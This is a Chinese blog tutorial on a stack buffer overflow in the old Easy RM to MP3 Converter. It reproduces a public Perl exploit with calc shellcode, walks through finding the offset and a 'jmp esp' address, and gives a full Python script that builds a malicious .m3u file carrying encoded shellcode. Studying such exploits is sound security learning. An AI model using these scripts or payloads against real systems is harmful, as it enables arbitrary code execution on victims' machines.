经典栈溢出 Easy RM to MP3 Converter

最新推荐文章于 2021-03-18 22:55:14 发布
最新推荐文章于 2021-03-18 22:55:14 发布
阅读量4.3k 收藏
点赞数
分类专栏: Pwn Windows
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/83345305
版权
Pwn 同时被 2 个专栏收录
28 篇文章 8 订阅
订阅专栏
Windows
16 篇文章 4 订阅
订阅专栏

以一个样本(Easy RM to MP3 Converter)将作为经典栈溢出的讲解实例,首先说明此实验是WIN10环境下复现的;

“Easy RM 2 MP3 Converter”是一个音频格式的转换工具,年代比较久远了。在2009年7月17日,packetstormsecurity公开了该软件的一个栈溢出漏洞并提供了exploit:https://packetstormsecurity.com/files/79357/Easy-RM-To-MP3-Converter-Stack-Overflow.html

Exp-DB也收录了这一漏洞:https://www.exploit-db.com/exploits/9186/

公开的exp我运行不起了,我们先来分析一下这个exp:

#!/usr/bin/perl
# Easy RM to MP3 Converter .m3u file Universall Stack Overflow Exploit
# it's so diferent to the first exploit .pls
# by stack
# xd Alpha zrebti 3liha :d
# Thnx to Zigma & His0k4 & HOD
my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46".
            "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F".
            "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20".
            "\x0D\x0A\x44\x3A\x5C";
  
my $junk  = "\x41" x 1293;
my $ret   = "\xDB\x70\xBB\x01"; # Universal return adress :d
my $nop   = "\x90" x 220;
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
my $calc_shell =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
    "\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47".
    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48".
    "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48".
    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
    "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
    "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38".
    "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
    "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
    "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43".
    "\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57".
    "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a".
    "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b".
    "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33".
    "\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
    "\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39".
    "\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36".
    "\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a";
 
$id = $ARGV[0];
if ($id==1){
print "$header$junk$ret$nop$calc_shell";
exit;
}
print "\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print " +++                                                              +++\n";
print " +++                                                              +++\n";
print " +++ Easy RM to MP3 Converter Universall Stack Overflow Exploit   +++\n";
print " +++ Written By Stack                                             +++\n";
print " +++                                                              +++\n";
print " +++   Usage Ex.: perl $0 1 >>Exploit.m3u                         +++\n";
print " +++                                                              +++\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
exit;
#EOF

 

这段shellcode明显是由header,junk,ret(返回地址),nop填充以及一个弹出计算机的shellcode构成的,其中这个header可能是指定的文件的文件头,header和junk是用于填充ESP和EBP之间的内存空间(包括EBP本身),而”\xDB\x70\xBB\x01”是一个硬编码的地址,这个地址很可能是“jmp esp”或者"call esp"之类指令的地址;

因为这段shellcode已经不能用了,所以我们需要重新去寻找junk字符串的大小,“jmp esp”或者“call esp”的地址,只要找到这两个主要的东西后,我们就可以重新部署我们的shellcode了;

我们先用python来重新书写一下exp的模板:

import sys
header = "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46" 
header += "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"
header += "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"
header += "\x0D\x0A\x44\x3A\x5C"
junk = "A" * 10000
payload = header + junk
if len(sys.argv) < 2:
    print 'usage: python ' + sys.argv[0] +' name.m3u'
else:
    with open(sys.argv[1],"w") as f:
        f.write(payload)

 

我将junk字符串用10000个"A"来替代,然后暂时去除了shellcode,然后,我们用命令行来生成一个ev1.m3u的文件,然后用这个程序打开:

程序弹出了一个对话框,提示了一个错误,点击确定后程序一切正常,并没有崩溃;

于是我们将10000个“A"改为30000个“A”,重新生成文件ev1.m3u,然后重新用这个软件打开此文件,发现程序死掉了;

根据我们对栈溢出的理解,程序崩溃是因为当前栈帧的返回地址被0x41414141所覆盖,而0x41414141处的指令是不可控的(内存空间要么未分配,要么指令因不可控而异常)。通过调试器来定位一下,程序的最后是否按照预期所想。使用Windbg附加进程,g命令运行起来,然后加载evil1.m3u,然后我们用dd esp命令查看一下:

可以看到程序确实跑到了0x41414141指令处;

定位ret eip

但要如何定位ret eip在栈上的地址呢?我们填充的数据全是’A’,崩溃时根本看不出是哪个地址处的’A’覆盖了ret addr。

对于这种情形,有2种常见的手法来解决:

  1. 第一种是直接通过动态调试和静态调试,比如找到关键函数调用地址,通过下断点的方式,在程序崩溃前后观察栈内存空间,如果是静态调试的话甚至可以根据反汇编码直接计算出ret addr与可控输入数据的距离。
  2. 第二种是懒人万用方法,可以直接用一组pattern特征junk来填充,观察程序崩溃时跳转的地址来定位ret addr与数据起始的偏移。

第二种方法无疑比较简单,这里就使用它来操作一下,直接用windbg的mona.py插件:

!py mona pattern_create 30000

 

用HEX这30000个字节数据替代之前的poc.py中的junk;数据大,不贴代码

可以观察到这一组数据有很明显的特征,可以根据这一组精心够造的序列轻易的判断出ret addr是哪4个连续的字节。

再次调试,看看ret address跳到了哪里:

因为Intel是小端,所以我们把地址换成”\x48\x6d\x33\x48”,把这4个字节在30000个字节中搜索一下,就知道ret addr的偏移了。

可以手动搜索,也可以继续用mona.py插件提供的pattern_offset。最终找到偏移为26105;

编写exp

要让我们的esp可用,那么只需要找到一条稳定的”jmp esp“指令的地址,覆盖ret addr,就可以了;

而jmp esp的地址我们可以通过mona插件的jmp -r esp -m KERNEL32.DLL来查找。选择kernel32.dll是因为它比较稳定,这个dll会被所有用户态应用程序加载,且基址固定(系统未开启ASLR,就算开启了ASLR,这个地址在重启前也都是固定的(受限于Windows DLL加载的设计),方便调试),除了kernel32.dll,user32.dll也经常作为选择;

 

我们用0x75a9dd50覆盖ret addr,shellcode先暂时设置成”\xcc”,也就是’int 3’指令。

再次测试,程序确实如预期跳到了栈上的shellcode起始字节处开始执行(当前是int 3)了,说明这个地址可以用;

于是最终的exp:

import sys

header = "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46" 
header += "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"
header += "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"
header += "\x0D\x0A\x44\x3A\x5C"

junk="A"*26105

ebp="B"*4

ret = "\x50\xdd\xa9\x75"     #jmp esp

buf ="\xb8\x6f\xa0\x67\x4a\xd9\xc3\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
buf +="\x30\x31\x42\x13\x03\x42\x13\x83\xea\x93\x42\x92\xb6\x83\x01"
buf +="\x5d\x47\x53\x66\xd7\xa2\x62\xa6\x83\xa7\xd4\x16\xc7\xea\xd8"
buf +="\xdd\x85\x1e\x6b\x93\x01\x10\xdc\x1e\x74\x1f\xdd\x33\x44\x3e"
buf +="\x5d\x4e\x99\xe0\x5c\x81\xec\xe1\x99\xfc\x1d\xb3\x72\x8a\xb0"
buf +="\x24\xf7\xc6\x08\xce\x4b\xc6\x08\x33\x1b\xe9\x39\xe2\x10\xb0"
buf +="\x99\x04\xf5\xc8\x93\x1e\x1a\xf4\x6a\x94\xe8\x82\x6c\x7c\x21"
buf +="\x6a\xc2\x41\x8e\x99\x1a\x85\x28\x42\x69\xff\x4b\xff\x6a\xc4"
buf +="\x36\xdb\xff\xdf\x90\xa8\x58\x04\x21\x7c\x3e\xcf\x2d\xc9\x34"
buf +="\x97\x31\xcc\x99\xa3\x4d\x45\x1c\x64\xc4\x1d\x3b\xa0\x8d\xc6"
buf +="\x22\xf1\x6b\xa8\x5b\xe1\xd4\x15\xfe\x69\xf8\x42\x73\x30\x96"
buf +="\x95\x01\x4e\xd4\x96\x19\x51\x48\xff\x28\xda\x07\x78\xb5\x09"
buf +="\x6c\x76\xff\x10\xc4\x1f\xa6\xc0\x55\x42\x59\x3f\x99\x7b\xda"
buf +="\xca\x61\x78\xc2\xbe\x64\xc4\x44\x52\x14\x55\x21\x54\x8b\x56"
buf +="\x60\x37\x4a\xc5\xe8\xb8"

nop = "\x90" * 30

shellcode = nop + buf

payload=header+junk +ebp +ret+ "Z"*4+ shellcode

if len(sys.argv) < 2:
    print 'usage: python ' + sys.argv[0] +' name.m3u'
else:
    with open(sys.argv[1],"w") as f:
        f.write(payload)

 

钞sir
关注
专栏目录
Easy RM to MP3 Converterv2.7.3(CVE-2009-1330)漏洞
06-20 503
软件名称:Easy RM to MP3 Converter 软件版本:2.7.3 漏洞模块:PM2MP3Converter.exe 操作系统:Windows 7\sp1\x86 漏洞编号:CVE-2009-1330 危害等级:中危 漏洞类型:缓冲区溢出 威胁类型:本地 1. 软件介绍 Easy RM to MP3 Converter为05-06年流行的支持常用音频格式文件MP3,...
漏洞学习之CVE-2009-1330 Easy RM to MP3 Converter
ATree的博客
11-18 947
最近学习了有关漏洞方面的知识,了解虽不是很深刻,但是也还算是入了坑,稍微知道点,别人在谈论时,也可以接上话了。 目标软件是Easy Rm to MP3 Converter,根据CVE上的公示可知,它的漏洞是在对.m3u音频列表文件解析出了问题,通过了解可知,.m3u文件是文本文件,这就给我们比较大的发展空间了,非常方便的构造一个这样的文件然后去触发这个漏洞产生。我们在构造这个文件时需要注
Easy RM to MP3 Converter 2.7.3.700
03-12
Easy RM to MP3 Converter 2.7.3.700
Easy RM to MP3 Converter栈溢出定位及漏洞利用
weixin_30374009的博客
08-19 283
  本文主要是Easy RM to MP3 Converter(MFC++编写)栈溢出的定位及windows下shellcode编写的一些心得。   用到的工具及漏洞程序下载地址https://github.com/5N1p3R0010/Easy-RM-to-MP3-Converter   首先,在填充字符为10000和20000时,异常被捕捉到 在填充字符为30000时,程序崩溃...
Easy RM to MP3 Converter Version 2.7.3 700漏洞分析
w4y2'blog
04-03 1925
软件链接:http://pan.baidu.com/s/1eQcLbpw 测试环境:xp sp3 看了exploit编写教程第一篇,知道了这个小软件有溢出漏洞,教程上用的是windbg分析的,由于咱习惯了界面友好的OD,对于教程上的分析步骤不是很感冒,既然知道了这是个有溢出漏洞的软件,那不如自己用OD亲自实践一把。   运行程序,界面如图,下方为它的版本号。    
Easy RM to MP3 Converter(2.7.3.700)栈溢出漏洞调试笔记
weixin_33778544的博客
03-08 435
Debug_Orz · 2014/10/13 17:410x00 基础知识1 Windows环境选取wmplayer.exe程序运行时的内存布局示意,包括栈,堆,加载模块(DLLs)和可执行文件本身。Win32进程空间布局示意。1.2 入口点(Entrypoint)运行一个EXE的时候,会先根据IAT表加载相应的DLL,并且用GetProcAddress得到API的真实地址。也就是说EXE运行后,...
Easy RM to MP3 Converter
08-24
Easy RM to MP3 Converter:深入理解栈溢出与安全》 在IT行业中,音频转换工具Easy RM to MP3 Converter是一款常见的实用软件,主要用于将RealMedia格式(RM)的音频文件转换为更通用的MP3格式。然而,该软件的...
基于栈溢出的EXPLOIT编写
01-10 2822
声明:以下涉及的内容只作为学习的目的,任何因为滥用本篇内容而导致对个人或者企业组织造成危害,作者并不承担任何责任。 ◆ 目标软件 Easy RM to MP3 Converter(版本2.7.3.700) ◆ 辅助工具 WinDbg6.12、Metasploit3.4.1、ActivePerl5.12 ◆ 漏洞描述 通过创建一个恶意的.m3u文件将触发Easy RM to MP3 Converter (version 2.7.3.700)缓冲区溢出利用。 ◆ 测试平台 Windows
Exploit 编写系列教程.pdf
09-06
教程中,作者通过一个简单的Perl脚本来演示如何创建一个恶意的.m3u文件,这个文件能够触发Easy RM to MP3 Converter的缓冲区溢出。这个脚本生成的.m3u文件填充了10000个ASCII码的'A'字符,这种大量填充常用于测试...
EasyRMtoMP3Converter.exe 栈溢出无果之因
weixin_34344677的博客
01-05 146
2019独角兽企业重金招聘Python工程师标准>>> ...
AVIMPEGWMVRMtoMP3Converter(音频视频转换为MP3)V1.8.4免费绿色汉化版
08-07
AVI MPEG WMV RM to MP3 Converter是一款几乎把所有的音频视频文件转换为 MP3 的好工具,快来下载体验吧。 软件介绍 软件虽名为 AVI MPEG WMV RM to MP3 Converter ,但实际上它可以在mp3,wma,wav,ogg 等音频格式之间相互转换,还可以把视频格式如rmrmvb,avi,mpeg,wmv,asf,dat,mov等转换为音频格式m
MID to MP3
08-06
可以将 MID 文件转换为 MP3文件,小巧好用。
适合中文版本的Easy RM to MP3 Converter rop 过depexploit
thesum的专栏
05-01 890
#------------------------------------------------------------ #ROP based exploit for Easy RM to MP3 Converter #written by corelanc0d3r - http://www.corelan.be #-------------------------------------
VirtualProtect 2方法 -direct ret-dep-easy rm to mp3
weixin_30885111的博客
06-25 120
本次试验已经解决了 00字符的问题, 还有的问题在于用了很多的 系统DLL 试验在 XP SP3 下进行的~~~~ 例子软件:easy rm to mp3 2.7.3.700~~~~~~~~~~~~~~~~~~~~~~~ ROP链 = 很多歌ROP小配件 ROP小配件 =每个指令 + ret 怎么找 ROP小配件: 1 直接找一些指令+r...
Easy RM to MP3 Converter漏洞分析报告
qq_32843153的博客
08-17 378
Easy RM to MP3 Converter漏洞分析报告   软件名称:PCManFTP 软件版本:2.0 漏洞模块:RM2MP3Converter.exe 模块版本:2.7.3.700 编译日期:2006-09-29 操作系统:Windows XP/2003/7/8.1/10 漏洞编号:NULL 危害等级:高危 漏洞类型:缓冲区溢出 威胁类型:本
Easy RM to MP3 漏洞调试
xiaoeryu_的博客
03-18 335
0X00 前言 分析这个漏洞主要是为了学习怎么通过调试并编写溢出类型漏洞的EXP 0X01 分析环境 调试环境 版本 系统版本 XP_sp3 Easy RM to MP3 2.7.3.700 windbg 6.12 0X02 漏洞描述 这个漏洞是一个典型的溢出类型漏洞,在处理字符的时候没有对长度做限制,在读取到第25000~30000个字符的时候会导致返回地址被覆盖导致溢出 0X03 漏洞分析 编写perl脚本生成漏洞验证文件 my $file= "crash25000.m3u"
Exploit Easy RM 2 MP3的学习笔记
weixin_42127015的博客
05-28 233
这篇文章,是我的学习笔记。很多人在学习二进制的漏洞挖掘的时候,都会觉得入门很难,甚至是看不下去,其实我到不是这样认为的,无论学习什么都是要抓住重点和原理,知识在于分享,有很多人觉得如果我会了,就不应该告诉别人,我不是这么认为,我在外国也经常会分享一些东西,大家都很感兴趣,有的时候就会把我拉入私人小组,我也认识很多喜欢分享的朋友比如红尘,大柱子等等。还有就是你要做这件事的目标是什么,你的目标如何...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值